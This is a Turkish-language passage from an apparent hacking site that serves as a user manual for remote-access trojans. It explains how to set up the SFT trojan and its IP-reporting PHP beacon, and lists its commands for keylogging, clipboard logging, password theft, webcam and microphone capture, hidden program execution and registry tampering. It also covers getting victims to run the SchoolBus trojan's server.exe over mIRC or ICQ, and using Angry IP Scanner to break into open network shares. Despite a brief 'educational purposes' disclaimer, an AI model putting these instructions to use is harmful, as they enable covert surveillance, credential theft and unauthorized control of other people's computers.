ve Pano Logger. Bu iki özellik sayesinde, kurbanın yazmış olduğu herşey ve başmış olduğu klavyedeki tuşlar bir dosyada pencere adlarıyla kayıtlı tutulur. Böylece yazılan Email şifreleri, yollanan mailler, yollanan adresler, chat yapılan kişiler, chat yaparken yazılanlar, kısacası kullanıcının yazdığı herşey kayıtlı tutulur. Bununlada kalınmaz, Pano Logger (Clipboardlogger) ile de kullanıcının Kopyaladığı her text bir dosyada tarihleri ve pencereleriyle kayıtlı tutulur. Böylece klayeden girmeyip kopyalayarak yolladığı, yazdığı textlerden de haberiniz olur. Bunlar size maille yollanır. ICQ 2003 Şifre , Internet Şifreleleri gibi bilgisayarda tanınan ve gizlenen şifrelerin çalınması. Bir trojanın yapabileceği herşey ve daha fazlası! Örneğin MSN çalma gibi özellikler eklemedim, çünkü MSN gibi messengerların bilgileri zaten bilgisayarda saklı oluyor. Bunlar registryde olduğu için, SFT'nin Registry komutlarıyla bir MSN yada başka herhangi bir program rahatlıkla TakeOver yapılabilir. Aynı şey ICQ History ve Şifreleri içinde geçerlidir. Çünkü sonuçta bunların hepsi dosya veya registryde saklanmaktadır. Clientsiz kullanım. Kurbanınıza, Linux, BeOS, Mac, PS2 gibi diğer işletim sistemi ve Pc ortamlarıylada bağlanabilirsiniz.

• •

• •

SFT ile bir bilgisayara girmek için, Server editör programını çalıştırıp, server'ı yükleyip gerekli ayarları yapmanız gerekmektedir. Daha sonra, kurban'ın IPsi ile ilgili bilgileri ve daha fazlasını alabilmek için, IPSENDER.php dosyasını, lycos yada lycos.co.uk gibi PHP dosyalarına izin veren bir siteye yada kendi sitenize upload edeceksiniz. IPSENDER.php içindeki bilgileri kendi isteğinize göre ayarlamalısınız. İçinde bulunan mail adresi bilgisini ayarladıktan sonra sitenize upload etmeli ve "Sender URL" kısmına, ipsender.php nin tam urlsini girmelisiniz. Örneğin, http://www.spymastersnake.org/ipsender.php gibi. Kurbana bağlanmak için Bir FTP Clienti yada Telnet gibi komut işleyecek bir client'e ihtiyacınız var. Hangi tarz FTP programı kullandığınız önemli değil, ancak ben "Pro" versiyonlarını öneriyorum. Özelliklede "Cute FTP Pro". Eğer ki hiçbir FTP programı yoksa, üzülmeyin, MS-DOS komut penceresini açıp FTP yazarakta bu işi yapabilirsiniz :) XP Pro makinalarda yolladığınız serverlar için dikkat etmeniz gereken bir husus var. Bazen server'ı yolladığınız anda kurbana bağlanamayabilirsiniz. Bu durumlarda server'a bağlanabilmeniz için kurbanın bilgisayarını yeniden

Bunun yanında. kopyaladıkları ve daha bir çok bilgide gelecektir. FTP Hostname kısmına kurbanın ipsini.. isterseniz. size şifreleri.gif" gibi bir isimle kaydedilmiş dosyayı alabilirsiniz. bu masaüstünün görüntüsünün HomeDir Altına "sc. Masaüstünün görüntüsünü almak için komut olarak "literal" yazın. biraz php kodlama biliyorsanız. onuda girin. var olan başka bir trojan'ın (Sub7) Victim Listesini kullanabilirsiniz. FTP Logunun olduğu ekranda sağ tuşa tıklayp. kurbana bağlanınız. ve antivirüs programları var. Eğerki CuteFTP yada başka FTP programıyla bağlantı hataları alırsanız "PASV" modu yerine "PORT" modu kullanın. Eğer ki Kurbana Her windowsta bulunan FTP komutuyla bağlanmak isterseniz: En önce serverınızın portu 21 olmalıdır. Kısacası isterseniz bu programı FTP diye. Onun client'ini Microsoft. Bir FTP Clienti ile hata alırsanız. HomeDir olacaktır. ancak o client'i boyutu hem büyük olacaktır hemde clienti anti-virüs yüklü bilgisayarda açamayacksınız. Normal bir trojanla bir önceden hazırlanmış client'e ihtiyacınız olacaktır. Aksi takdirde FTP komutu kurbanı görmez. ScreenShot alındı gibi bir mesaj da görürseniz. girin ve daha sonra şifre soracaktır.. her Windows ile beraber dağıtıyor :) Böylece nerde olursanız olun bir şey download etmeden kurbanınıza bağlanmış olacaksınız. Yada tam tersi. başka bir client kullanınız. Bu durum sadece sizin bağlanmanızı geciktirir. bu komutunuzun karşıya gittiğini gösterir. MS-Dos penceresini açın ve "FTP" yazın. Diyelim ki kurbanın masaüstünü görmek istiyorsak. Bu dosyayı almak için. Örneğin Cute FTP Pro ile. Sizinde kurbanınıza bağlanmanız lazım. onlarca hatta yüzlerce mail adresine dağıtabilir ve belirli bir kurbandan gelen maili belli bir mail hesabına yollayabilirsiniz. Bağlandığınızda karşınıza gelecek olan Remote klasör.gif" olarak kaydedildiğini göstermektedir. Enter Raw FTP Command'ı ( Yada Commands --> Enter Manual Cmd) seçmeli daha sonra "capture" yazmalısınız. Daha sonra çıkan boş alana "capture" yazın. Kurbanlardan gelen bilgileri. Cevap mesajı çıkacaktır. . Ancak SFT için böyle bir durum söz konusu değil. isterseniz. İsterseniz Keylogger diye kullanabilirsiniz :) Ayrıca içinde bir SMTP clienti olmayıp bu işi bir php dosyası ile yapması. Daha sonra Connect tuşuna basıp. Çünkü server. Ancak server açıldığı anda göreve başlar ve size mail ile tüm gereken kayıtları yollar. remote folder'ı refresh yapın ve dosyayı download edin. Eğer ki php yada Perl ile socks biliyorsanız. Karşı makinedeki gizli ve sistem dosyalarını görmek için "NLST" Simple Directory Listing yöntemini kullanın. Daha sonra "Open kurbanınIPsi" yazın. Diyelimki Bir internet kafedesiniz. Daha sonra "ls" komutuyla klasörün içeriğini görüntelip "get" komutuyla "sc. Komut Alındı gibi bir mesaj görürseniz.php üzerinden maille gelecektir. Login olduktan sonra. Serverınızın portu 21 ise. Trojan diye. kendinize Victim List yapabilir. bilgisayardaki tüm güvenlik önlemlerini kapattıktan sonra bilgisayar yeniden başlamaya ihtiyaç duyar. Size Username soracaktır. verileri icq yada her hangi bir programada yollatabilirsiniz :) Yani bir kısıtlama yada kalıp mevcut değildir.başlatması gerekebilir. Remote folder HomeDir olacaktır. Aynı şekilde kurbanlarınızın IPsi size IPSENDER. server'a bağlanmak için şunlar yapılmalı: Programı açıp. Port kısmına ve diğer kısımlara ise ayarladığınız değerleri yazınız. yeni bir bağlantı ekleyin. yazdıkları. maillerin kaybolmadan size gelmesini sağlayacak ve isterseniz.

Daha basit bir trojan için SchoolBus TR'ı denemelisiniz. SERVERINFO • • Parametresiz çalıştırıldığında server ayarlarını FTP Loguna yazar. SpyMasterSnake.. Kullanılması en kolay trojan olduğunu söyleyebilirim. Bu sayede server açıldığı makinada sadece Sendlog işlevlerini yerine getirecektir. Türkiye'de. Kısacası bu program. Bu trojan. bu piyasada.. Slogan aynı. Server editörde sağ tıklayıp. sistemi ele geçirmek. SFT Kullanılması için bilgiye ihtiyaç duyan. eğlenceden çok. SAVE: Bu parametre ile çalıştırıldığında server ayarlarını HomeDir altında "Servinf" olarak kaydeder. komutlarla çalışan bir trojandır. "Server Port Açmasın" kısmını işaretleyiniz.. SHUTDOWN • Kurbanın bilgisayarını kapatır.. bilgisayarı bilen bir kullanıcı için. kapatma şansınız bulunmamaktadır ve server'a "updateserver" yada "remoserver" gibi komutları veremezsiniz. HomeDir altına "Ras" olarak kaydedilir. GETCACHEDPASS . Yada program yazıyorsanız.EXECHIDE komutu ile karşı bilgisayarda gizlice bir bat dosyası çalıştırabilirsiniz. Eğer ki FTP kullanmayı bilmiyorsanız. Bir web sitesine girmiş gibi.. SchoolBus TR. HTTP Trojan ile kurbanınıza herhangi bir web browser ile bağlanabileceksiniz. Bu programın yapabilecekleri . kurbanın bilgisayarını kontrol edebileceksiniz.. Böylece istediğiniz MS-Dos komutuyla istediğinizi yapabilirsiniz. istediğiniz bir şey için program yazıp gizlice çalıştırabiliriniz. Ama bunu bir proje haline dönüştürdüm.Org'un ilkleri ve farklı olanı yapma geleneği devam etmiş olup. FTP Komutlarıyla beraber 100'ün üzerinde komut içermektedir. Bu trojan kendim için hazırladığım bir trojandır.. sizin bildiklerinizle sınırlıdır.. Dial-Up şifreleri. SFT. sistemi sonuna kadar açmaktadır.Org malıdır. masaüstünü bile göremezsiniz. Bu komut girildiğinde. düşünerek birşeyler ürettiğimizi göstermiş olacağım. Önemli olan olmayanı yapmaktır". Unutmayın ki. RAS • Parametresiz çalışır. Trojanın FTP işlevini kapatmak ve sadece bir KeyLogger gibi kullanmak istiyorsanız. REGISTRY'e ait komutlarla istediğiniz her türlü ayar ve veriyle oynayabilirsiniz. bu özelliği açtığınız zaman. Her türlü programı takeover yapabilirsiniz. Ve FTP Trojan yanına bir de HTTP Trojan (SpyMasterSnake HTTP Trojan[SHT]) ile bu projedeki kilit Clientsiz kullanım olanağı doruğa çıkaracağım. profesyonel. Kısacası Client=Browser olacak :) Böylece SpyMasterSnake. "Var olan zaten vardır. bilgi sızdırmak amaçlı yapılmıştır.

Nooluyo Burda??" SNDRECORD • • • ON: Kurbanın bilgisayarında bir mikrofon takılı ise. Çalma işlemi bittikten sonra FTP logundan size haber verilir.wav olarak Kaydeder. Lite versiyonda. SAVE: Kayıtı durmuşsa. Alınan görüntüyü HomeDir altına Webcam. OFF: Kayıtı o anlık durdurur. KEYBOARDLOCK • • ON: Klayve ve mouse'ı kilitler. Daha sonra ise uzun bir ambulans sireni duyulur. . durdurup kaydeder. mikrofon girişini mixer ayarlarından açarak kayıt yapmaya başlar. Devam etmek için ON komutu gerekir. bu komutla onun yazdıklarının yanına sizin yazdıklarınızı ekleyebilirsiniz. HomeDir altına SndCapture. OFF: Kilitlenen Klavye ve mouse'ı tekrar açar. şifre kaydedilme seçili değilse bile şifreyi alabilirsiniz. SENDKEYS • • Kurban bir yerlere yazı yazarken.idx dosyalarını almalısınız ve internette bulunan ICQHR gibi history okuyan yada ICQrInfo gibi şifre okuyan programları kullanabilirsiniz. en önce Smooth Criminal melodisi çalmaya başlar. Örnek: "senderror İşlemcide Su Bulundu. Windows Batacak!!" WEBCAM • Kurbanın bilgisayarında bir kamera takılı ise.dat ve *. Eğer durmamışsa. Örnek: "senkeys Selam. SENDERROR • • Bu komutla kullanıcıya istediğiniz hata mesajını gösterebilirsiniz. ICQPASS2003 • ICQ 2003 ve Lite'ın şifrelerini almanızı sağlar. HomeDir altına "Cached" olarak kaydedilir.reg" olarak kaydeder. Bunun için ICQ klaösründeki *. kamerayı açar ve bir görüntü alıp kapatır. ICQ'nun önceki sürümlerindeki şifreleri alamazsınız. BEEP • Komut girildikten sonra Kasa Speaker'ından (Ses kartına yada hoparlöre ihtiyaç yoktur).• Sadece Win9x makinelerde çalışır ve bilgisayarda şifre diye kayıtlı tutulmuş olan verileri gösterir. URLHISTORY • Kurbanın internet explorer çubuğuna yazarak girdiği siteleri registryden alır ve "History.jpg olarak kaydeder. Bu esnada OFF komutu girilse kayıt o anlık durur.

taşıyamaz. Kurban çalışan programı görmez. Download ettiğiniz şeyin uzantısını ". RESTARTSERVER • Server için yapılan deişikliklerin kaydedilmesini sağlayan ve serverı tekrar başlatan komuttur. görünen program pencerelerini ve görünmeyen program pencerelerini HomeDir altına "Proc" olarak kaydeder.ext" ile değişitirip kendi bilgisayarınıza download edin.. *. Çalışan programları görmek için "Proclist" komutunu kullanabilisiniz. KILL • • Çalışan herhangi bir programı kapatır.bat dosyasını gizli bir şekilde çalıştırır. HomeDir altına "Sys" olarak kaydedilir. Örneğin. EXECHIDE • Bir program veya komut.exe uzantılı program görünmez olarak çalıştırılamaz. hızı. EXEC • Herhangi bir program yada dosyayı. üzerine çift tıklanmış gibi çalıştırır. Komutu bir mesajla kullanmanız lazımdır.exe" PROCLIST • Çalışan programları. CPU adı. Her yazacağınızın başına "msj" . kapatamaz. Örnek: "kill icq. Ne download ederseniz edin bu dosya adı değişmez. Kurban chat ekranını arka plana alamaz. SYSINFO • Kurbanın bilgisayarıyla ilgili bilgileri gösterir. DOWNLOADFROMNET • Kurbanın bilgisayarına internetten bir dosya indirir ve HomeDir Altına "Downloaded. SHOWTASKBAR • Başlat butonunun üzerinde bulunduğu SystemTray çubuğunu görünür yapar.ext" olarak kaydeder. Bir çok ayarı değiştirdikten sonra bir kere bu komutu girmenizde yeterli olacaktır..HIDETASKBAR • Başlat butonunun üzerinde bulunduğu SystemTray çubuğunu görünmez yapar. Kurbanın yazdıkları size FTP logu ile gözükür. Ancak her *. MSJ • Karşı taraf ile chat yapmanızı sağlar. işletim sistemi gibi.

Komut parametresiz girilince o an için aktif hale gelir. Komutu kullanırken URL başına "http://" koymazsanız komut çalışmayacaktır. Görüntü kalitesi iyidir. Aksi takdirde yazdıklarınız komut olarak algılanır. sadece 256 renktir. Örnek: "playwav billiejean.• komutunu yazmalısınız.org" yada "webpage mailto:// admin@spymastersnake. Örnek: "webpage http://www.orgBu mail adresi spam botlara karşı korumalıdır.spymastersnake. SETUSERNAME • • Serverın FTP kullanıcı adını değiştirir. CAPTURE • • • • • • Kurbanın bilgisayarın ekranının görüntüsünü alır ve HomeDir altına "sc.wav" isimli bir dosyayı upload edersek.wav" komutunu girmek yeterlidir. isteğiniz dakika süreince capture işlemi yapılır. . Bu dosyanın büyüklüğü yaklaşık 23-30 KB kadardır. OFF: Capture komutunu kapatır. Kullanımı: Örneğin 5 dakika için girilece komut "capture setminute+5" dir. görebilmek için Javascript açık olmalıdır" CDROM • Kurbanın CD-ROM'unu açar. Bir FTP sitesini göstermek için "ftp://". Örneğin Homedir altına "BillieJean. Bu işlem sırasında size FTP logundan bilgi yollanır.. bilgisayar ekranının her 5 dakikada bir görüntüsünün alınıp. PLAYWAV • • Homedir altına kaydetmiş olduğunuz Wave dosyasını çalar. SETMINUTE: Saatbaşı yerine. HOUR: Bilgisayar açık olduğu sürece saat başı bilgisayar ekranının görüntüsü kaydeder. Outlook gibi mail programları için "mailto://" koyabilirsiniz. Bu pencere sizin bağlantınızın kopması ile de otomatik kapanabilmektedir. Burdaki "+" toplama ile alakalı değildir. 5 sn açık bekletir ve daha sonra kapatır. Böylece bilgisayar ekranının görüntüsü bir daha alınmaz. Örnek: Siz: "msj selam naber?" Cevap: "250 iidir senden?" Siz: "msj bende iyiyim saol" MSJOFF • MSJ komutu ile açılan chat penceresini kapatır. Örnek: "setusername gokhanmuh" daha sonra restartserver komutu gerekir. HomeDir altına kaydedilmesini sağlar. Bu şekilde verilen bir komut.gif" olarak kaydeder. WEBPAGE • • Kurbanın bilgisayarında bir web sitesi açar. ONLINE: Kurban internetteyken saat başı yada sizin ayarladığınız dakika süresince bilgisayar ekranının görüntüsünü alıp kaydeder.

SETHOMEDIR • • • Kurbana bağlandığınızda. SETRUNDIR • • • Serverın EXEsinin çalışacağı klasördür. Örnek: C:\ altındaki klasörlerin birinde DangerousWorldtour1.jpg. HomeDir her zaman boş ve sistem klasörü olmayan bir klasör olmalıdır. Örnek: "victim LittleSusie" daha sonra restartserver komutu gerekir.SETPASSWORD • • Serverın FTP şifresini değiştirir. VICTIM • • Kurbanın adını değiştirir. Ve asla HomeDir ile aynı olmamalıdır!! Örnek: "setrundir System" daha sonra restartserver komutu gerekir.com/ipsender. Dikkat: Bütün Rundirler Windows klasörü altındadır..jpg gibi bir dosyayı bulmak istiyorsak. SETURL • • Sender URLyi değiştirmenizi sağlar. HomeDir Gibi Windows Altındadır.php" daha sonra restartserver komutu gerekir. Mesela DangerousWorldTour36. "search ..jpg. Bunların hepsini aramak için: "search C:\+DangerosusWorldTour*. Örnek: "sethomedir sfthomedir" daha sonra restartserver komutu gerekir. Örnek: "setpassword 123456" daha sonra restartserver komutu gerekir. Bu yüzden yolu girerken içinde sürücü adı kullanmayınız ve başında yada sonunda "\" işareti bulundurmayınız!!! Örneğin Win98 kurulu bir bilgisayarda RunDir'i "C:\Windows\System" gibi bir klasör yapmak için "setrundir System" yazmanız gerekmektedir. Örnek: "setport 21" daha sonra restartserver komutu gerekir. Dosyayı ararken "*" işarei kullanılmalı veya tam dosya adı girilmelidir.txt olarak kaydedilir. Sonuçlar HomeDir altına Search. Dikkat: Bütün homedirler Windows klasörü altındadır. Örnek: "seturl http://www. Böyledece "*" karakterinden önce eşlenen her dosya bulunur. SEARCH • • Kurbanın bilgisayarında bir dosyayı aramını sağlar. gibi dosyalar bulunsun. DangerousWorldTour2. Bu yüzden yolu girerken içinde sürücü adı kullanmayınız ve başında yada sonunda "\" işareti bulundurmayınız!!! Örneğin Win98 kurulu bir bilgisayarda HomeDir'i "C:\Windows\System\homedir" gibi bir klasör yapmak için "sethomedir System\homedir" yazmanız gerekmektedir..sizinsiteniz.jpg" komutu girilmelidir. sizin masaüstünüz olacak olan klasörün yolunu değiştirir. SETPORT • • Serverın FTP portunu değiştirir.

OFF: İşlemi kapatır.exe silinmemiş olması lazım. HomeDir altına "ClipLogged" olarak kaydeder. Sadece Online iken değil. Örnek: "exportreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtarı altındaki tüm anahtarlar ve girdiler Exported. Bu değer bir Dize değeridir.reg uzantılı dosyaları registry'e girer. Konması zorunludur. EXPORTREG • • Registryden bir anahtarı tüm özellikleriyle ve alt anahtarlarıyla *. ALL: Bilgisayar açıkken kaydı tutar.jpg" yazılmalıdır.reg dosyası haline çevirir ve HomeDir altına Exported. LOG . şifre. SENDLOG • • ON: Kaydedilen. IMPORTREG • • Homedir altında bulunan *. Bu değer bir Dize değeridir. bu <Benim Değerim> sonucu olacaktır. Eğer Yukardaki örneği denediyseniz. Örnek: "addreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis+Benim Girdim+Benim Değerim" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtarı altına <Benim Girdim> diye bir dize değeri ve <Benim Değerim> adında bir value atamış olduk. Burda kullanılan "+" işaretlerini aynı şekilde kullanınız.reg olarak kaydedilir. Örnek: "importreg Girdi.reg olarak atar. READREG • • Registryden bir değer okumanızı sağlar.C:\+DangerousWorldTour36. Sonuçlar FTP logunda görünecektir. ADDREG • • Registry'e bir Girdi ve değer girmenizi sağlar.*" Burdaki "+" aranacak dosya ile içinde aranacak klasörü ayıran bir karakterdir. log.jpg" yazılması lazımdır.reg burda HomeDir altındadır. Komutun çalışması için karşı makinede regedit. cliplog gibi her türlü bilgiyi Sender url üzerinden yollar.reg" Girdi. Tüm JPG dosyalarını bulmak için "search C:\+*. OFF: Bu özelliği kapatır. ONLINE: Sadece kurban online iken kopyalanan textlerin kaydını tutar. CLIPBOARDLOG • • • • Komut parametresiz girilince o an için aktif hale gelir. İçinde Dangerous kelimesini başında içeren bir dosyayı bulmak için ise "search c:\+dangerous*. Örnek: "readreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis+Benim Girdim" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtarı altına <Benim Girdim> değeri okunmuş olur.

Gökhan Muharremoğlu Turkey's Unique. Real. © 2004 . REMOVESERVER • • Server'ı kaldırır. HomeDir altına "Logged" olarak atar. Örnek: "updateserver EditörŞifresi+YeniServer.exe HomeDir altında olmalıdır. Bunun için yeni versiyonu ayarlayıp. Parametre ile girilince o oturum için maximum kullanıcı sayısını belirler. O şifreyide girmeniz gerekmektedir. Eğer ki server'ınıza bir editör şifresi koyduysanız. bu yardım dosyasını kaydeder. Legendary & Best CompuTech Security Site <!--[if !supportLineBreakNewLine]--> <!--[endif]--> SCHOOLBUS PROGRAMI KULLANIMI Öncelikle Schoolbus ile girdiğiniz makinalarda neler yapabileceğinize bakalım. Örnek: "maxclients 20" UPDATESERVER • • • • Server'ı yeni bir versiyonuyla değiştirir. Örnek: "updateserver YeniServer. . Örnek: "removeserver" yada "removeserver editörşifresi" SERVERHELP • HomeDir altına "Help.SpyMasterSnake. HomeDir altına atmalısınız. her zaman işlemi yapar. ALL: Sadece onlie iken değil.exe" YeniServer. Örnek: "sendmsg SelamünAleyküm" MAXCLIENTS • • • Parametresiz girilince o oturum için en fazla kaç kullanıcının bağlanacağını gösterir. Eğerki server editör şifresi varsa şu şekilde kullanılmalı. SENDMSG • • Kurbanın ekranına bir mesaj yollar.exe" + İşareti Konmak zorundadır.Org Mechatronic X Security NetWork . ONLINE: Bilgisayar online iken.. OFF: İşlemi kapatır.html" olarak. kurbanın yazdığı herşeyi kaydeder.• • • • Komut parametresiz girilince o an için keylogger'ı açar.

Clienti çalıştırdıktan sonra trojenli (yani server.) Get Cached Passwords : Eger Get system passwords le şifreleri alamassanız bu tuşa basın ve girdiğiniz makinanın kapanmasını bekleyin veya kendiniz resetleyin kullanıcı tekrar nete girdiğinde önceden yazmayan şifrelerini artık görebilirsiniz. Keyboar Maneger : Kurbanın yazdıklarını görebilir ve eger chat yapıyorsa onun adıyla sizde buradan chat yapabilirsiniz. Clear Password : Koyduğunuz server şifresini kaldırır. File Maneger : Karşı makinadan dosya download etmenize ve upload etmenize yarar.:)) Şimdide Clientin üzerindeki programların ne işe yaradığına bakalım: Change Server Port : Karşı bilğisayarındaki trojenin portunu değiştirmenize yarar.exe nin bulunduğu) makinanın ipsini sağ üsteki boşluğa yazıyorsunuz ve "Connect to" tuşuna basıyorsunuz ve "Connect to" yazan yerde "Disconnect" yazana kadar bekliyorsunuz. download) *Web sayfasyna gönderme *Program çalıştırma (parametre kullanilabilir. Enter Server Password : Servera şifre koyarak sizden başka kimsenin bu makinaya girmemesiniz sağlayabilirsiniz. e mail şifresi. İnternetten çektiğiniz zipli haldeki Schoolbus programının içinde "server.Diyelimki "server. (örneğin internet şifresi. yani format bile atabilirsiniz) *Mouse kontrolü *Mouse tuşlarının yerini degistirme *Windows'u shut down etme *Cd açma/kapama Şimdi programı nasıl kullanabileceğinizi anlatacağım. Bunlardan "server. Application Maneger : Kurban'nın bilğisayarındaki açık program ve pencereleri gösterir buradan istediğiniz programı veya pencereyi kapatabilirsiniz.exe" olmak üzere iki program bulunur. Şimdi yapmanız gereken şey kendi makinanızda "Client. .exe" ve "client. İşte sonunda Disconnect yazdı ve programın üzerindeki bütün düğmeler aktif hale geldi ve karşı bilğisayara girmeyi başardınız tebrikler.*Mesaj gönderme *Chat açma *Password leri alma *Windows'u göçertme *Dosya kontrolü *Dosya transferi (upload..(Schoolbus Portu 54321'dir. Crash Windows : Kurbanın makinasını kilitleyebilirsiniz.exe" gireceğiniz makinada açılması gereken dosyadır ve bunu sakın kendi makinanızda açmayı.exe" yi çalışmak.exe" yi birisine mirc yoluyla veya icq ile gönderdiniz ve açmasını sağladınız.Başkalarının bilğisayarlarına girmeniz için öncelikle bu dosyanın daha önceden o makinada açılması gerekir. Buradan bu portu istediğiniz gibi değiştirebilirsiniz. Get System Passwords : Bu tuşla bilğisayardaki bütün şifreleri alabilirsiniz. icq şifresi gibi.

Tabi makina tekrar açılınca gene girebilirsiniz. Close Server : Kurban makinasını kapatana kadar o makinadaki trojeni kapatabilirsiniz böylece kimse giremez. Torn On Monitör : Monitörü tekrar açanilirsiniz. Project R3x Programıda Kullanıma açık share . Run Programme : Kurbanın hdd deki programları çalıştırabilir ve Kurbanın makinasına Format atabilirsiniz(formatı C sürücüsüne atamıyorsunuz) Open Cd Drive : Cd Sürücünün kapağını açabilirsiniz. Swap Mause Button : Kurbanın mause sinin tuşlarının yerini değiştirebilirsiniz. Get Icq Uıns : Kurban eger icq kullanıyorsa kurbanın icq numaralarını alabilir ve ne zaman online olduğunu böylece anlayabilirsiniz. Ip Scanner : Buradan mircte aldığınız ıpleri (irc ortamında ip ögrenme komutu /dns nick Dir.50 kısmını yazarsanız daha iyi olur)tarata bilirsiniz. Goto Web Page : Kurbanın browsırında istediğiniz bir web sitesini açabilirsiniz.Scanner sonunda trojenli bir ip bulursa sağ tarafta çıkmaktadır. Open Chat : Karşıtarafın ekranında çıkan ve kapatamadığı bir sayfa açarsınız ve buradan onunla chat yapabilirsiniz. Torn Off Monitör : Kurbanın monitörünü kapatabilirsiniz. Show TaskBar : Sakladığının Başlat çubuğunu tekrar eski haline getirebilirsiniz. Remove Server : Karşı makinadaki Schoolbus trojenini silebilirsiniz. Send Massage : Karşı tarafın ekranında windows hatası gibi görünen mesajlar gönderebilirsiniz.)(mesela 212.18 olarak bir ip aldınız İp Scanner kısmına aldığınız ipnin yanlız 212.253. Hide TaskBar : Kurbanın ekranındaki Başlat çubuğunu gizleyebilirsiniz. Capture Deskopt : Kurbanın ekranındaki görüntünün resmini çekebilir ve resme bakabilirsiniz.50. Change Data/Time : Kurbanın bilgisayarının tarihini ve saatini değiştirebilirsiniz.Shut Down Windows : Kurbanın makinasını kapatabilir veya resetleyebilirsiniz.253. Set Wallpaper : Ekranın arka plan görüntüsünü değiştirebilirsiniz PROJECT R3x PROGRAMI Angry ip. Close Cd Drive : Açtığınız Cdrom un kapağını kapatabilirsiniz.scanner Essantial Net Tools Programları Kullanıma Açık Share Bilgisayarlara girmek için kullanılan programlar olup kullanımları HACK bölümümüzde anlatılmıştı. Control Mause : Kurbanın mausunu kontrol edebilirsiniz.

Bilgisayarlara girebilmemiz için Öncelikle ağ ayarlarımızın tam olması gerekiyor. Resimde görüleceği üzere Scan Wrom: GDADRZFSQHYUCDDJBLVLMHAALPTCXLYRWTQTIPWIGYOKSTTZRCLBDXRQBGJS NBOHMKH basıyoruz. <!--[if !vml]--> <!--[endif]--> Şimdi teker teker denemeye basşlıyoruz en baştan sağ tuşa basıp . Ağ ayarlarınız zaten mevcutsa ağ ayarlarınızla oynamayanız. Angr ağ ayarları Resimli bölümdeki ağ ayarlarınızı aynen yapınız.bilgisayarlara giriş için kullanılan bir program olup. Hack Bölümü Angr İp Scannerin anlatımındaki ağ ayarlarının aynısı burada da geçerlidir. . İp aralığındaki bilgisayarlar listeleniyor. kullanım şekli aşağıda anlatılmıştır.

<!--[if !vml]--> <!--[endif]--> 5sn bekledikten sonra adamın bilgileri önümüze çıkıyor(Username.MAC adresi falan filan.) .Paylaşımları.

Kullanım için ne verilmişse sadece onunla yetininiz. c nin üzerine iki kez tıklıyoruz biraz bekledikten sonra diğer bilgisayara hemen bağlanıyoruz. Bir başkasının bilgisayarına girip de zarar vermek size hiç bir şey kazandırmaz. . Uyarmak ise çok şey kazandırır.<!--[if !vml]--> <!--[endif]--> görüldüğü üzere bilgisayarına girilebilecek olanlar resimde görüleceği üzere shares bölümünde c d gibi dizinleri görünenler. Burada verilen bilgiler eğitim amaçlıdır. PAYLAŞIMA AÇIK BİLGİSAYARLARA NASIL GİRİLİR Gerekli Programlar Angry ip Scanner: Paylaşıma açık bilgisayarları IP aralığı esasına göre arar. .

BAŞLAT : AYARLAR : DENETİM MASASI : AĞ ÇİFT TIKLAYIN VE AYARLARINIZI YAPIN AYARLARINIZ ZATEN MEVCUTSA AĞ AYARLARINIZLA OYNAMAYIN DOSYA VE YAZICI PAYLAŞIMINDA BAŞKALARINA DOSYALARIMA ERİŞİM HAKKI VEREBİLMEK İSTİYORUM SEÇENEĞİNİ KESİNLİKLE KULLANMAYIN. Lütfen kötü niyetli olarak kullanmayın.Burada verilen bilgiler eğitim amaçlıdır.. Eğer ağ ayarlarınız aşağıda belirtilen ağ ayarlarını içermiyorsa öncelikle ağ ayarlarınızı en az aşağıdaki şekilde ayarlamanız gerekir.Ağ Ayarları:Angry IP Scanner Pragramını çalıştırabilmek için öncelikle bilgisayarımızdaki ağ ayarlarının en az resimdeki ağ ayarları nı içirmesi gerekmektedir.. ..!!!!!!!!!!!! <!--[if !vml]--> <!--[endif]--> UYARI : 1.

Sağ tuşa tıklayıp Open computeri işaretlerseniz karşınıza bir menü daha açılacak ve o menüde ınt Explorer i seçip Entere basıp bekliyoruz. Eğer belirli bir IP aralığını scan edecekseniz IP range kısmındaki ip no sunun son numarası 1 olacak to kısmındaki IP nimarasının son rakamı ise 255 olacaktır.. Genelde mavi işaretlilerin üzerine gelerek. başka bir bir IP aralığı yazarak denemelerinize devam . Eğer tek IP yi scan edecekseniz to kısmınada aynı IP yi yazın. Resimde de görüleceği üzere bilgisayarın açık veya kapalı olduğu bağlantı hızları Hostnameleri açık portları yani kısaca bilgisayara girilip girilemeyeceği anlaşılmaktadır.Bu andan itibaren start butonuna basın ve scan işlemini başlatın. "d".. Paniğe kapılıp bilgisayarı resetlemeyin windows gezgini gibi bir ekran çıkıp size "c". "belgelerim" gibi dizinler gösterirse ne alaaaa.Kişilik haklarına saygımızdan dolayı örnek verilen IP ler ve paylaşıma açılmış bilgisayarlar listesi tamamen montaj tekniği kullanılarak hazırlanmış ve hayal ürünüdür. ANGARY İP SCANNERİN KULLANIMI: Angry IP Scanner programını çalıştırın ve IP range kutusuna scan edilecek IP yi yazın. Bu andan itibaren Karşı bilgisayarla bağlantı kurulmaya başlar ve ekran donmuş gibi olur. göstermezse.2. <!--[if !vml]--> <!--[endif]--> Scan işlemi devam ettikce paylaşıma açık veya kapalı bilgisayarlar listelenecektir.

Burda önemli olan nokta. Uyarmak ise bir çok şey kazandırır.. Kendi harddiskinizmiş gibi istediğiniz şekilde kullanabilirsiniz... Eğer paylaşım sadece okuma için verilmişse sadece dosya alabilir veya inceleyebilirsiniz. Eğer paylaşım tam yetki ile verilmişse. o paylaşıma açık bilgisayara giriş şifreli demektir. Bu tür bilgisayarlara girmek için bir takım şifreler denemek gerekir.. Zor iş En iyisi bir başka IP ye geçin <!--[if !vml]--> <!--[endif]--> Zarar vermek size hiçbir şey kazandırmayacaktır.edin. <!--[if !vml]--><!--[endif]--> Süprizzzzz eğer aşağıdaki ekranı görüyorsanız. ...

